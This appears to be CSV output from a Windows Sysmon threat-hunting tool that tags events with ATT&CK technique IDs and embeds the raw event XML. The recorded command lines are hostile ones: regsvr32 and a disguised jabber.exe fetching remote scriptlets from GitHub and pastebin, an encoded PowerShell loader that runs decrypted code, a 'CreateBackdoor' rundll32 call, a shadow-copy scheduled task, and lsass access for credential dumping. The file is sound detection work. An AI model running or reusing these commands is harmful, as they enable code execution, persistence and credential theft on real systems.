+[T1085] Rundll32 Execution detected,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.215293Z"">
+    </TimeCreated>
+    <EventRecordID>243538</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.021</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00106F6A2000</Data>
+    <Data Name=""ProcessId"">2536</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969979.57807,2019-05-27T19:12:59.578070+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:59.519768Z"">
+    </TimeCreated>
+    <EventRecordID>6193</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:59.510</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE7B-5CEB-0000-0010867F0C00</Data>
+    <Data Name=""ProcessId"">4012</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Credential Dumping - Process Access,1552849805.303341,2019-03-17T23:10:05.303341+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>10</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>10</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-17T19:10:03.991455Z"">
+    </TimeCreated>
+    <EventRecordID>4442</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""344"" ThreadID=""2032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC04.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-17 19:10:02.068</Data>
+    <Data Name=""SourceProcessGUID"">365ABB72-9B85-5C8E-0000-0010C4CC1200</Data>
+    <Data Name=""SourceProcessId"">3576</Data>
+    <Data Name=""SourceThreadId"">3620</Data>
+    <Data Name=""SourceImage"">C:\Windows\system32\taskmgr.exe</Data>
+    <Data Name=""TargetProcessGUID"">365ABB72-0886-5C8F-0000-001030560000</Data>
+    <Data Name=""TargetProcessId"">476</Data>
+    <Data Name=""TargetImage"">C:\Windows\system32\lsass.exe</Data>
+    <Data Name=""GrantedAccess"">0x1fffff</Data>
+    <Data Name=""CallTrace"">C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Windows\system32\taskmgr.exe+1360e|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d</Data>
+  </EventData>
+</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557686932.766629,2019-05-12T22:48:52.766629+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T18:48:52.766629Z"">
+    </TimeCreated>
+    <EventRecordID>16840</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""108"" ThreadID=""1268"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 18:48:52.344</Data>
+    <Data Name=""ProcessGuid"">365ABB72-6A94-5CD8-0000-0010C2F10E00</Data>
+    <Data Name=""ProcessId"">3880</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-695E-5CD8-0000-002015370100</Data>
+    <Data Name=""LogonId"">0x13715</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6A94-5CD8-0000-00101BDB0E00</Data>
+    <Data Name=""ParentProcessId"">1340</Data>
+    <Data Name=""ParentImage"">C:\ProgramData\jabber.exe</Data>
+    <Data Name=""ParentCommandLine"">jabber.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.971708,2019-05-27T05:29:17.971708+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Line Number: 0&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.971708Z"">
+    </TimeCreated>
+    <EventRecordID>5907</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.931</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00108C7FFF00</Data>
+    <Data Name=""ProcessId"">3196</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Line Number: 0&quot; /text:processmodel.username</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1555606584.893827,2019-04-18T20:56:24.893827+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( Powershell ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:56:08.370067Z"">
+    </TimeCreated>
+    <EventRecordID>13</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1086,technique_name=PowerShell</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:56:08.340</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">Powershell</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
+    <Data Name=""LogonId"">0xca21</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AC01-5CB8-0000-0010BB7E0700</Data>
+    <Data Name=""ParentProcessId"">1196</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;cmd.exe&quot; /s /k pushd &quot;C:\Users\IEUser\Desktop&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-18T17:51:14.254967Z"">
+    </TimeCreated>
+    <EventRecordID>18851</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2044"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-18 17:51:14.254</Data>
+    <Data Name=""ProcessGuid"">365ABB72-4612-5CE0-0000-00103D1E2600</Data>
+    <Data Name=""ProcessId"">2600</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-433D-5CE0-0000-002031350100</Data>
+    <Data Name=""LogonId"">0x13531</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-433C-5CE0-0000-00100FD20000</Data>
+    <Data Name=""ParentProcessId"">964</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-18T17:51:14.254967Z"">
+    </TimeCreated>
+    <EventRecordID>18851</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2044"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-18 17:51:14.254</Data>
+    <Data Name=""ProcessGuid"">365ABB72-4612-5CE0-0000-00103D1E2600</Data>
+    <Data Name=""ProcessId"">2600</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-433D-5CE0-0000-002031350100</Data>
+    <Data Name=""LogonId"">0x13531</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-433C-5CE0-0000-00100FD20000</Data>
+    <Data Name=""ParentProcessId"">964</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-18T17:51:14.254967Z"">
+    </TimeCreated>
+    <EventRecordID>18851</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2044"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-18 17:51:14.254</Data>
+    <Data Name=""ProcessGuid"">365ABB72-4612-5CE0-0000-00103D1E2600</Data>
+    <Data Name=""ProcessId"">2600</Data>
